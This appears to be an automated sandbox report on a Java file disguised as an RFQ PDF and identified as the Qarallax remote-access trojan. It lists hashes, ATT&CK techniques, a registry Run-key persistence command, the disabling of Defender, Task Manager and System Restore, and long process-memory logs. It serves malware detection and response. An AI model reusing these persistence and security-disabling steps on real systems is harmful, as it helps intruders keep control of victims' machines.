qarallax | 375701c84c2f332cdf71661d126066344087b88f26e0b3b1e8f761c7fdeacacd

Analysis

max time kernel
144s
max time network
149s
platform
windows10_x64
resource
win10v200722
submitted
26-08-2020 09:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Atlas Home Products Inc RFQ_pdf.jar
Size

411KB
MD5

f1a78d7990291195a2a680f972ee7738
SHA1

f5f7cb70a383b7afa313f3c96f7b8153ad4afab9
SHA256

375701c84c2f332cdf71661d126066344087b88f26e0b3b1e8f761c7fdeacacd
SHA512

08b0b7167bb2b4068eaf43bcdf3b75e2991429ccd90344d401f41a3669b66c9f74911c1969a7004b41e1ffe29d2481c7652cb3485e17a2eff052e7437d4ec2df

Score

10^/10

trojan qarallax persistence evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae25-64.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
3876	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\baNwA	java.exe
File opened for modification	C:\Windows\System32\baNwA	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
4544	taskkill.exe
5008	taskkill.exe
4484	taskkill.exe
864	taskkill.exe
3856	taskkill.exe
4232	taskkill.exe
792	taskkill.exe
1300	taskkill.exe
3896	taskkill.exe
1192	taskkill.exe
696	taskkill.exe
4540	taskkill.exe
4944	taskkill.exe
1620	taskkill.exe
3856	taskkill.exe
4332	taskkill.exe
3408	taskkill.exe
4344	taskkill.exe
4628	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3988	powershell.exe
3988	powershell.exe
3988	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3876	java.exe

Suspicious use of AdjustPrivilegeToken 167 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4016	WMIC.exe
Token: SeSecurityPrivilege	4016	WMIC.exe
Token: SeTakeOwnershipPrivilege	4016	WMIC.exe
Token: SeLoadDriverPrivilege	4016	WMIC.exe
Token: SeSystemProfilePrivilege	4016	WMIC.exe
Token: SeSystemtimePrivilege	4016	WMIC.exe
Token: SeProfSingleProcessPrivilege	4016	WMIC.exe
Token: SeIncBasePriorityPrivilege	4016	WMIC.exe
Token: SeCreatePagefilePrivilege	4016	WMIC.exe
Token: SeBackupPrivilege	4016	WMIC.exe
Token: SeRestorePrivilege	4016	WMIC.exe
Token: SeShutdownPrivilege	4016	WMIC.exe
Token: SeDebugPrivilege	4016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4016	WMIC.exe
Token: SeRemoteShutdownPrivilege	4016	WMIC.exe
Token: SeUndockPrivilege	4016	WMIC.exe
Token: SeManageVolumePrivilege	4016	WMIC.exe
Token: 33	4016	WMIC.exe
Token: 34	4016	WMIC.exe
Token: 35	4016	WMIC.exe
Token: 36	4016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4016	WMIC.exe
Token: SeSecurityPrivilege	4016	WMIC.exe
Token: SeTakeOwnershipPrivilege	4016	WMIC.exe
Token: SeLoadDriverPrivilege	4016	WMIC.exe
Token: SeSystemProfilePrivilege	4016	WMIC.exe
Token: SeSystemtimePrivilege	4016	WMIC.exe
Token: SeProfSingleProcessPrivilege	4016	WMIC.exe
Token: SeIncBasePriorityPrivilege	4016	WMIC.exe
Token: SeCreatePagefilePrivilege	4016	WMIC.exe
Token: SeBackupPrivilege	4016	WMIC.exe
Token: SeRestorePrivilege	4016	WMIC.exe
Token: SeShutdownPrivilege	4016	WMIC.exe
Token: SeDebugPrivilege	4016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4016	WMIC.exe
Token: SeRemoteShutdownPrivilege	4016	WMIC.exe
Token: SeUndockPrivilege	4016	WMIC.exe
Token: SeManageVolumePrivilege	4016	WMIC.exe
Token: 33	4016	WMIC.exe
Token: 34	4016	WMIC.exe
Token: 35	4016	WMIC.exe
Token: 36	4016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3932	WMIC.exe
Token: SeSecurityPrivilege	3932	WMIC.exe
Token: SeTakeOwnershipPrivilege	3932	WMIC.exe
Token: SeLoadDriverPrivilege	3932	WMIC.exe
Token: SeSystemProfilePrivilege	3932	WMIC.exe
Token: SeSystemtimePrivilege	3932	WMIC.exe
Token: SeProfSingleProcessPrivilege	3932	WMIC.exe
Token: SeIncBasePriorityPrivilege	3932	WMIC.exe
Token: SeCreatePagefilePrivilege	3932	WMIC.exe
Token: SeBackupPrivilege	3932	WMIC.exe
Token: SeRestorePrivilege	3932	WMIC.exe
Token: SeShutdownPrivilege	3932	WMIC.exe
Token: SeDebugPrivilege	3932	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3932	WMIC.exe
Token: SeRemoteShutdownPrivilege	3932	WMIC.exe
Token: SeUndockPrivilege	3932	WMIC.exe
Token: SeManageVolumePrivilege	3932	WMIC.exe
Token: 33	3932	WMIC.exe
Token: 34	3932	WMIC.exe
Token: 35	3932	WMIC.exe
Token: 36	3932	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3932	WMIC.exe
Token: SeSecurityPrivilege	3932	WMIC.exe
Token: SeTakeOwnershipPrivilege	3932	WMIC.exe
Token: SeLoadDriverPrivilege	3932	WMIC.exe
Token: SeSystemProfilePrivilege	3932	WMIC.exe
Token: SeSystemtimePrivilege	3932	WMIC.exe
Token: SeProfSingleProcessPrivilege	3932	WMIC.exe
Token: SeIncBasePriorityPrivilege	3932	WMIC.exe
Token: SeCreatePagefilePrivilege	3932	WMIC.exe
Token: SeBackupPrivilege	3932	WMIC.exe
Token: SeRestorePrivilege	3932	WMIC.exe
Token: SeShutdownPrivilege	3932	WMIC.exe
Token: SeDebugPrivilege	3932	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3932	WMIC.exe
Token: SeRemoteShutdownPrivilege	3932	WMIC.exe
Token: SeUndockPrivilege	3932	WMIC.exe
Token: SeManageVolumePrivilege	3932	WMIC.exe
Token: 33	3932	WMIC.exe
Token: 34	3932	WMIC.exe
Token: 35	3932	WMIC.exe
Token: 36	3932	WMIC.exe
Token: SeDebugPrivilege	3408	taskkill.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	4484	taskkill.exe
Token: SeDebugPrivilege	696	taskkill.exe
Token: SeDebugPrivilege	4540	taskkill.exe
Token: SeDebugPrivilege	4944	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3988	powershell.exe
Token: SeSecurityPrivilege	3988	powershell.exe
Token: SeTakeOwnershipPrivilege	3988	powershell.exe
Token: SeLoadDriverPrivilege	3988	powershell.exe
Token: SeSystemProfilePrivilege	3988	powershell.exe
Token: SeSystemtimePrivilege	3988	powershell.exe
Token: SeProfSingleProcessPrivilege	3988	powershell.exe
Token: SeIncBasePriorityPrivilege	3988	powershell.exe
Token: SeCreatePagefilePrivilege	3988	powershell.exe
Token: SeBackupPrivilege	3988	powershell.exe
Token: SeRestorePrivilege	3988	powershell.exe
Token: SeShutdownPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeSystemEnvironmentPrivilege	3988	powershell.exe
Token: SeRemoteShutdownPrivilege	3988	powershell.exe
Token: SeUndockPrivilege	3988	powershell.exe
Token: SeManageVolumePrivilege	3988	powershell.exe
Token: 33	3988	powershell.exe
Token: 34	3988	powershell.exe
Token: 35	3988	powershell.exe
Token: 36	3988	powershell.exe
Token: SeIncreaseQuotaPrivilege	5084	WMIC.exe
Token: SeSecurityPrivilege	5084	WMIC.exe
Token: SeTakeOwnershipPrivilege	5084	WMIC.exe
Token: SeLoadDriverPrivilege	5084	WMIC.exe
Token: SeSystemProfilePrivilege	5084	WMIC.exe
Token: SeSystemtimePrivilege	5084	WMIC.exe
Token: SeProfSingleProcessPrivilege	5084	WMIC.exe
Token: SeIncBasePriorityPrivilege	5084	WMIC.exe
Token: SeCreatePagefilePrivilege	5084	WMIC.exe
Token: SeBackupPrivilege	5084	WMIC.exe
Token: SeRestorePrivilege	5084	WMIC.exe
Token: SeShutdownPrivilege	5084	WMIC.exe
Token: SeDebugPrivilege	5084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5084	WMIC.exe
Token: SeRemoteShutdownPrivilege	5084	WMIC.exe
Token: SeUndockPrivilege	5084	WMIC.exe
Token: SeManageVolumePrivilege	5084	WMIC.exe
Token: 33	5084	WMIC.exe
Token: 34	5084	WMIC.exe
Token: 35	5084	WMIC.exe
Token: 36	5084	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5084	WMIC.exe
Token: SeSecurityPrivilege	5084	WMIC.exe
Token: SeTakeOwnershipPrivilege	5084	WMIC.exe
Token: SeLoadDriverPrivilege	5084	WMIC.exe
Token: SeSystemProfilePrivilege	5084	WMIC.exe
Token: SeSystemtimePrivilege	5084	WMIC.exe
Token: SeProfSingleProcessPrivilege	5084	WMIC.exe
Token: SeIncBasePriorityPrivilege	5084	WMIC.exe
Token: SeCreatePagefilePrivilege	5084	WMIC.exe
Token: SeBackupPrivilege	5084	WMIC.exe
Token: SeRestorePrivilege	5084	WMIC.exe
Token: SeShutdownPrivilege	5084	WMIC.exe
Token: SeDebugPrivilege	5084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5084	WMIC.exe
Token: SeRemoteShutdownPrivilege	5084	WMIC.exe
Token: SeUndockPrivilege	5084	WMIC.exe
Token: SeManageVolumePrivilege	5084	WMIC.exe
Token: 33	5084	WMIC.exe
Token: 34	5084	WMIC.exe
Token: 35	5084	WMIC.exe
Token: 36	5084	WMIC.exe
Token: SeDebugPrivilege	4344	taskkill.exe
Token: SeDebugPrivilege	4232	taskkill.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeDebugPrivilege	4628	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	4544	taskkill.exe
Token: SeDebugPrivilege	3856	taskkill.exe
Token: SeDebugPrivilege	792	taskkill.exe
Token: SeDebugPrivilege	5008	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	3896	taskkill.exe
Token: SeDebugPrivilege	3856	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	4332	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3876	java.exe

Suspicious use of WriteProcessMemory 416 IoCs

description	pid	Process	procid_target
PID 3876 wrote to memory of 2564	3876	java.exe	67
PID 3876 wrote to memory of 2564	3876	java.exe	67
PID 3876 wrote to memory of 2844	3876	java.exe	70
PID 3876 wrote to memory of 2844	3876	java.exe	70
PID 2844 wrote to memory of 4016	2844	cmd.exe	72
PID 2844 wrote to memory of 4016	2844	cmd.exe	72
PID 3876 wrote to memory of 3528	3876	java.exe	74
PID 3876 wrote to memory of 3528	3876	java.exe	74
PID 3528 wrote to memory of 3932	3528	cmd.exe	76
PID 3528 wrote to memory of 3932	3528	cmd.exe	76
PID 3876 wrote to memory of 1476	3876	java.exe	77
PID 3876 wrote to memory of 1476	3876	java.exe	77
PID 3876 wrote to memory of 3384	3876	java.exe	79
PID 3876 wrote to memory of 3384	3876	java.exe	79
PID 3876 wrote to memory of 492	3876	java.exe	81
PID 3876 wrote to memory of 492	3876	java.exe	81
PID 3876 wrote to memory of 1072	3876	java.exe	82
PID 3876 wrote to memory of 1072	3876	java.exe	82
PID 3876 wrote to memory of 1192	3876	java.exe	84
PID 3876 wrote to memory of 1192	3876	java.exe	84
PID 3876 wrote to memory of 1380	3876	java.exe	86
PID 3876 wrote to memory of 1380	3876	java.exe	86
PID 3876 wrote to memory of 1568	3876	java.exe	88
PID 3876 wrote to memory of 1568	3876	java.exe	88
PID 3876 wrote to memory of 1884	3876	java.exe	90
PID 3876 wrote to memory of 1884	3876	java.exe	90
PID 3876 wrote to memory of 740	3876	java.exe	93
PID 3876 wrote to memory of 740	3876	java.exe	93
PID 3876 wrote to memory of 3988	3876	java.exe	95
PID 3876 wrote to memory of 3988	3876	java.exe	95
PID 3876 wrote to memory of 3408	3876	java.exe	97
PID 3876 wrote to memory of 3408	3876	java.exe	97
PID 740 wrote to memory of 4064	740	cmd.exe	99
PID 740 wrote to memory of 4064	740	cmd.exe	99
PID 3876 wrote to memory of 3520	3876	java.exe	100
PID 3876 wrote to memory of 3520	3876	java.exe	100
PID 3876 wrote to memory of 3964	3876	java.exe	101
PID 3876 wrote to memory of 3964	3876	java.exe	101
PID 3876 wrote to memory of 1572	3876	java.exe	104
PID 3876 wrote to memory of 1572	3876	java.exe	104
PID 3876 wrote to memory of 2196	3876	java.exe	105
PID 3876 wrote to memory of 2196	3876	java.exe	105
PID 3876 wrote to memory of 1300	3876	java.exe	108
PID 3876 wrote to memory of 1300	3876	java.exe	108
PID 3876 wrote to memory of 1888	3876	java.exe	109
PID 3876 wrote to memory of 1888	3876	java.exe	109
PID 3876 wrote to memory of 2136	3876	java.exe	112
PID 3876 wrote to memory of 2136	3876	java.exe	112
PID 3876 wrote to memory of 2720	3876	java.exe	113
PID 3876 wrote to memory of 2720	3876	java.exe	113
PID 3876 wrote to memory of 3872	3876	java.exe	116
PID 3876 wrote to memory of 3872	3876	java.exe	116
PID 3876 wrote to memory of 1580	3876	java.exe	117
PID 3876 wrote to memory of 1580	3876	java.exe	117
PID 3876 wrote to memory of 4232	3876	java.exe	120
PID 3876 wrote to memory of 4232	3876	java.exe	120
PID 3876 wrote to memory of 4248	3876	java.exe	121
PID 3876 wrote to memory of 4248	3876	java.exe	121
PID 740 wrote to memory of 4356	740	cmd.exe	124
PID 740 wrote to memory of 4356	740	cmd.exe	124
PID 3876 wrote to memory of 4384	3876	java.exe	125
PID 3876 wrote to memory of 4384	3876	java.exe	125
PID 3876 wrote to memory of 4396	3876	java.exe	126
PID 3876 wrote to memory of 4396	3876	java.exe	126
PID 3876 wrote to memory of 4484	3876	java.exe	129
PID 3876 wrote to memory of 4480	3876	java.exe	130
PID 3876 wrote to memory of 4484	3876	java.exe	129
PID 3876 wrote to memory of 4480	3876	java.exe	130
PID 3876 wrote to memory of 4520	3876	java.exe	132
PID 3876 wrote to memory of 4520	3876	java.exe	132
PID 3876 wrote to memory of 4588	3876	java.exe	135
PID 3876 wrote to memory of 4588	3876	java.exe	135
PID 3876 wrote to memory of 4676	3876	java.exe	138
PID 3876 wrote to memory of 4676	3876	java.exe	138
PID 3876 wrote to memory of 4728	3876	java.exe	139
PID 3876 wrote to memory of 4728	3876	java.exe	139
PID 3876 wrote to memory of 4784	3876	java.exe	142
PID 3876 wrote to memory of 4784	3876	java.exe	142
PID 3876 wrote to memory of 4868	3876	java.exe	145
PID 3876 wrote to memory of 4868	3876	java.exe	145
PID 3876 wrote to memory of 4892	3876	java.exe	146
PID 3876 wrote to memory of 4892	3876	java.exe	146
PID 3876 wrote to memory of 4936	3876	java.exe	147
PID 3876 wrote to memory of 4936	3876	java.exe	147
PID 3876 wrote to memory of 5008	3876	java.exe	150
PID 3876 wrote to memory of 5008	3876	java.exe	150
PID 3876 wrote to memory of 5056	3876	java.exe	152
PID 3876 wrote to memory of 5056	3876	java.exe	152
PID 3876 wrote to memory of 512	3876	java.exe	155
PID 3876 wrote to memory of 512	3876	java.exe	155
PID 3876 wrote to memory of 2220	3876	java.exe	156
PID 3876 wrote to memory of 2220	3876	java.exe	156
PID 3876 wrote to memory of 1956	3876	java.exe	159
PID 3876 wrote to memory of 1956	3876	java.exe	159
PID 3876 wrote to memory of 696	3876	java.exe	161
PID 3876 wrote to memory of 696	3876	java.exe	161
PID 3876 wrote to memory of 4216	3876	java.exe	162
PID 3876 wrote to memory of 4216	3876	java.exe	162
PID 3876 wrote to memory of 4304	3876	java.exe	165
PID 3876 wrote to memory of 4304	3876	java.exe	165
PID 3876 wrote to memory of 4148	3876	java.exe	167
PID 3876 wrote to memory of 4148	3876	java.exe	167
PID 3876 wrote to memory of 2140	3876	java.exe	169
PID 3876 wrote to memory of 2140	3876	java.exe	169
PID 3876 wrote to memory of 1192	3876	java.exe	171
PID 3876 wrote to memory of 1192	3876	java.exe	171
PID 512 wrote to memory of 3972	512	cmd.exe	173
PID 512 wrote to memory of 3972	512	cmd.exe	173
PID 512 wrote to memory of 4424	512	cmd.exe	174
PID 512 wrote to memory of 4424	512	cmd.exe	174
PID 3876 wrote to memory of 4540	3876	java.exe	175
PID 3876 wrote to memory of 4540	3876	java.exe	175
PID 3876 wrote to memory of 4464	3876	java.exe	177
PID 3876 wrote to memory of 4464	3876	java.exe	177
PID 4464 wrote to memory of 4652	4464	cmd.exe	179
PID 4464 wrote to memory of 4652	4464	cmd.exe	179
PID 4464 wrote to memory of 4516	4464	cmd.exe	180
PID 4464 wrote to memory of 4516	4464	cmd.exe	180
PID 3876 wrote to memory of 4716	3876	java.exe	181
PID 3876 wrote to memory of 4716	3876	java.exe	181
PID 4716 wrote to memory of 4856	4716	cmd.exe	183
PID 4716 wrote to memory of 4856	4716	cmd.exe	183
PID 4716 wrote to memory of 4600	4716	cmd.exe	184
PID 4716 wrote to memory of 4600	4716	cmd.exe	184
PID 3876 wrote to memory of 4476	3876	java.exe	185
PID 3876 wrote to memory of 4476	3876	java.exe	185
PID 3876 wrote to memory of 4944	3876	java.exe	187
PID 3876 wrote to memory of 4944	3876	java.exe	187
PID 4476 wrote to memory of 4616	4476	cmd.exe	189
PID 4476 wrote to memory of 4616	4476	cmd.exe	189
PID 4476 wrote to memory of 4356	4476	cmd.exe	190
PID 4476 wrote to memory of 4356	4476	cmd.exe	190
PID 3876 wrote to memory of 5108	3876	java.exe	191
PID 3876 wrote to memory of 5108	3876	java.exe	191
PID 5108 wrote to memory of 1064	5108	cmd.exe	193
PID 5108 wrote to memory of 1064	5108	cmd.exe	193
PID 5108 wrote to memory of 5064	5108	cmd.exe	194
PID 5108 wrote to memory of 5064	5108	cmd.exe	194
PID 3876 wrote to memory of 3964	3876	java.exe	195
PID 3876 wrote to memory of 3964	3876	java.exe	195
PID 3964 wrote to memory of 5116	3964	cmd.exe	197
PID 3964 wrote to memory of 5116	3964	cmd.exe	197
PID 3964 wrote to memory of 2364	3964	cmd.exe	198
PID 3964 wrote to memory of 2364	3964	cmd.exe	198
PID 3876 wrote to memory of 4932	3876	java.exe	199
PID 3876 wrote to memory of 4932	3876	java.exe	199
PID 3876 wrote to memory of 4896	3876	java.exe	201
PID 3876 wrote to memory of 4896	3876	java.exe	201
PID 4932 wrote to memory of 2588	4932	cmd.exe	203
PID 4932 wrote to memory of 2588	4932	cmd.exe	203
PID 4932 wrote to memory of 5032	4932	cmd.exe	204
PID 4932 wrote to memory of 5032	4932	cmd.exe	204
PID 4896 wrote to memory of 5084	4896	cmd.exe	205
PID 4896 wrote to memory of 5084	4896	cmd.exe	205
PID 3876 wrote to memory of 4868	3876	java.exe	206
PID 3876 wrote to memory of 4868	3876	java.exe	206
PID 4868 wrote to memory of 4128	4868	cmd.exe	208
PID 4868 wrote to memory of 4128	4868	cmd.exe	208
PID 4868 wrote to memory of 4956	4868	cmd.exe	209
PID 4868 wrote to memory of 4956	4868	cmd.exe	209
PID 3876 wrote to memory of 4972	3876	java.exe	210
PID 3876 wrote to memory of 4972	3876	java.exe	210
PID 4972 wrote to memory of 4000	4972	cmd.exe	212
PID 4972 wrote to memory of 4000	4972	cmd.exe	212
PID 4972 wrote to memory of 1320	4972	cmd.exe	213
PID 4972 wrote to memory of 1320	4972	cmd.exe	213
PID 3876 wrote to memory of 1328	3876	java.exe	215
PID 3876 wrote to memory of 1328	3876	java.exe	215
PID 1328 wrote to memory of 5056	1328	cmd.exe	217
PID 1328 wrote to memory of 5056	1328	cmd.exe	217
PID 1328 wrote to memory of 4112	1328	cmd.exe	218
PID 1328 wrote to memory of 4112	1328	cmd.exe	218
PID 3876 wrote to memory of 3564	3876	java.exe	219
PID 3876 wrote to memory of 3564	3876	java.exe	219
PID 3876 wrote to memory of 4344	3876	java.exe	221
PID 3876 wrote to memory of 4344	3876	java.exe	221
PID 3564 wrote to memory of 4336	3564	cmd.exe	223
PID 3564 wrote to memory of 4336	3564	cmd.exe	223
PID 3564 wrote to memory of 4288	3564	cmd.exe	224
PID 3564 wrote to memory of 4288	3564	cmd.exe	224
PID 3876 wrote to memory of 1624	3876	java.exe	225
PID 3876 wrote to memory of 1624	3876	java.exe	225
PID 1624 wrote to memory of 1380	1624	cmd.exe	227
PID 1624 wrote to memory of 1380	1624	cmd.exe	227
PID 1624 wrote to memory of 4188	1624	cmd.exe	228
PID 1624 wrote to memory of 4188	1624	cmd.exe	228
PID 3876 wrote to memory of 4200	3876	java.exe	229
PID 3876 wrote to memory of 4200	3876	java.exe	229
PID 4200 wrote to memory of 2612	4200	cmd.exe	231
PID 4200 wrote to memory of 2612	4200	cmd.exe	231
PID 4200 wrote to memory of 3796	4200	cmd.exe	232
PID 4200 wrote to memory of 3796	4200	cmd.exe	232
PID 3876 wrote to memory of 3768	3876	java.exe	233
PID 3876 wrote to memory of 3768	3876	java.exe	233
PID 3768 wrote to memory of 3572	3768	cmd.exe	235
PID 3768 wrote to memory of 3572	3768	cmd.exe	235
PID 3768 wrote to memory of 3748	3768	cmd.exe	236
PID 3768 wrote to memory of 3748	3768	cmd.exe	236
PID 3876 wrote to memory of 4116	3876	java.exe	237
PID 3876 wrote to memory of 4116	3876	java.exe	237
PID 4116 wrote to memory of 4668	4116	cmd.exe	239
PID 4116 wrote to memory of 4668	4116	cmd.exe	239
PID 3876 wrote to memory of 4232	3876	java.exe	240
PID 3876 wrote to memory of 4232	3876	java.exe	240
PID 4116 wrote to memory of 4368	4116	cmd.exe	241
PID 4116 wrote to memory of 4368	4116	cmd.exe	241
PID 3876 wrote to memory of 4720	3876	java.exe	243
PID 3876 wrote to memory of 4720	3876	java.exe	243
PID 4720 wrote to memory of 4812	4720	cmd.exe	245
PID 4720 wrote to memory of 4812	4720	cmd.exe	245
PID 4720 wrote to memory of 4648	4720	cmd.exe	246
PID 4720 wrote to memory of 4648	4720	cmd.exe	246
PID 3876 wrote to memory of 4580	3876	java.exe	247
PID 3876 wrote to memory of 4580	3876	java.exe	247
PID 4580 wrote to memory of 4428	4580	cmd.exe	249
PID 4580 wrote to memory of 4428	4580	cmd.exe	249
PID 4580 wrote to memory of 4700	4580	cmd.exe	250
PID 4580 wrote to memory of 4700	4580	cmd.exe	250
PID 3876 wrote to memory of 4944	3876	java.exe	251
PID 3876 wrote to memory of 4944	3876	java.exe	251
PID 4944 wrote to memory of 4724	4944	cmd.exe	253
PID 4944 wrote to memory of 4724	4944	cmd.exe	253
PID 4944 wrote to memory of 1464	4944	cmd.exe	254
PID 4944 wrote to memory of 1464	4944	cmd.exe	254
PID 3876 wrote to memory of 4728	3876	java.exe	255
PID 3876 wrote to memory of 4728	3876	java.exe	255
PID 4728 wrote to memory of 5004	4728	cmd.exe	257
PID 4728 wrote to memory of 5004	4728	cmd.exe	257
PID 3876 wrote to memory of 864	3876	java.exe	258
PID 3876 wrote to memory of 864	3876	java.exe	258
PID 4728 wrote to memory of 1944	4728	cmd.exe	260
PID 4728 wrote to memory of 1944	4728	cmd.exe	260
PID 3876 wrote to memory of 3100	3876	java.exe	261
PID 3876 wrote to memory of 3100	3876	java.exe	261
PID 3100 wrote to memory of 5008	3100	cmd.exe	263
PID 3100 wrote to memory of 5008	3100	cmd.exe	263
PID 3100 wrote to memory of 3892	3100	cmd.exe	264
PID 3100 wrote to memory of 3892	3100	cmd.exe	264
PID 3876 wrote to memory of 1836	3876	java.exe	265
PID 3876 wrote to memory of 1836	3876	java.exe	265
PID 1836 wrote to memory of 2600	1836	cmd.exe	267
PID 1836 wrote to memory of 2600	1836	cmd.exe	267
PID 1836 wrote to memory of 4272	1836	cmd.exe	268
PID 1836 wrote to memory of 4272	1836	cmd.exe	268
PID 3876 wrote to memory of 2844	3876	java.exe	269
PID 3876 wrote to memory of 2844	3876	java.exe	269
PID 2844 wrote to memory of 4416	2844	cmd.exe	271
PID 2844 wrote to memory of 4416	2844	cmd.exe	271
PID 2844 wrote to memory of 4184	2844	cmd.exe	272
PID 2844 wrote to memory of 4184	2844	cmd.exe	272
PID 3876 wrote to memory of 1380	3876	java.exe	273
PID 3876 wrote to memory of 1380	3876	java.exe	273
PID 1380 wrote to memory of 3408	1380	cmd.exe	275
PID 1380 wrote to memory of 3408	1380	cmd.exe	275
PID 1380 wrote to memory of 3528	1380	cmd.exe	276
PID 1380 wrote to memory of 3528	1380	cmd.exe	276
PID 3876 wrote to memory of 3972	3876	java.exe	277
PID 3876 wrote to memory of 3972	3876	java.exe	277
PID 3972 wrote to memory of 696	3972	cmd.exe	279
PID 3972 wrote to memory of 696	3972	cmd.exe	279
PID 3972 wrote to memory of 4556	3972	cmd.exe	280
PID 3972 wrote to memory of 4556	3972	cmd.exe	280
PID 3876 wrote to memory of 4620	3876	java.exe	281
PID 3876 wrote to memory of 4620	3876	java.exe	281
PID 4620 wrote to memory of 4856	4620	cmd.exe	283
PID 4620 wrote to memory of 4856	4620	cmd.exe	283
PID 4620 wrote to memory of 2808	4620	cmd.exe	284
PID 4620 wrote to memory of 2808	4620	cmd.exe	284
PID 3876 wrote to memory of 4232	3876	java.exe	285
PID 3876 wrote to memory of 4232	3876	java.exe	285
PID 4232 wrote to memory of 4976	4232	cmd.exe	287
PID 4232 wrote to memory of 4976	4232	cmd.exe	287
PID 3876 wrote to memory of 4628	3876	java.exe	288
PID 3876 wrote to memory of 4628	3876	java.exe	288
PID 4232 wrote to memory of 4560	4232	cmd.exe	290
PID 4232 wrote to memory of 4560	4232	cmd.exe	290
PID 3876 wrote to memory of 4512	3876	java.exe	291
PID 3876 wrote to memory of 4512	3876	java.exe	291
PID 4512 wrote to memory of 4468	4512	cmd.exe	293
PID 4512 wrote to memory of 4468	4512	cmd.exe	293
PID 4512 wrote to memory of 4732	4512	cmd.exe	294
PID 4512 wrote to memory of 4732	4512	cmd.exe	294
PID 3876 wrote to memory of 4680	3876	java.exe	295
PID 3876 wrote to memory of 4680	3876	java.exe	295
PID 4680 wrote to memory of 4016	4680	cmd.exe	297
PID 4680 wrote to memory of 4016	4680	cmd.exe	297
PID 4680 wrote to memory of 4048	4680	cmd.exe	298
PID 4680 wrote to memory of 4048	4680	cmd.exe	298
PID 3876 wrote to memory of 5020	3876	java.exe	299
PID 3876 wrote to memory of 5020	3876	java.exe	299
PID 5020 wrote to memory of 5028	5020	cmd.exe	301
PID 5020 wrote to memory of 5028	5020	cmd.exe	301
PID 5020 wrote to memory of 4704	5020	cmd.exe	302
PID 5020 wrote to memory of 4704	5020	cmd.exe	302
PID 3876 wrote to memory of 5032	3876	java.exe	303
PID 3876 wrote to memory of 5032	3876	java.exe	303
PID 5032 wrote to memory of 5008	5032	cmd.exe	305
PID 5032 wrote to memory of 5008	5032	cmd.exe	305
PID 5032 wrote to memory of 4112	5032	cmd.exe	306
PID 5032 wrote to memory of 4112	5032	cmd.exe	306
PID 3876 wrote to memory of 4304	3876	java.exe	307
PID 3876 wrote to memory of 4304	3876	java.exe	307
PID 4304 wrote to memory of 4148	4304	cmd.exe	309
PID 4304 wrote to memory of 4148	4304	cmd.exe	309
PID 4304 wrote to memory of 4416	4304	cmd.exe	310
PID 4304 wrote to memory of 4416	4304	cmd.exe	310
PID 3876 wrote to memory of 3132	3876	java.exe	311
PID 3876 wrote to memory of 3132	3876	java.exe	311
PID 3876 wrote to memory of 1620	3876	java.exe	313
PID 3876 wrote to memory of 1620	3876	java.exe	313
PID 3132 wrote to memory of 3528	3132	cmd.exe	314
PID 3132 wrote to memory of 3528	3132	cmd.exe	314
PID 3132 wrote to memory of 2240	3132	cmd.exe	316
PID 3132 wrote to memory of 2240	3132	cmd.exe	316
PID 3876 wrote to memory of 2724	3876	java.exe	317
PID 3876 wrote to memory of 2724	3876	java.exe	317
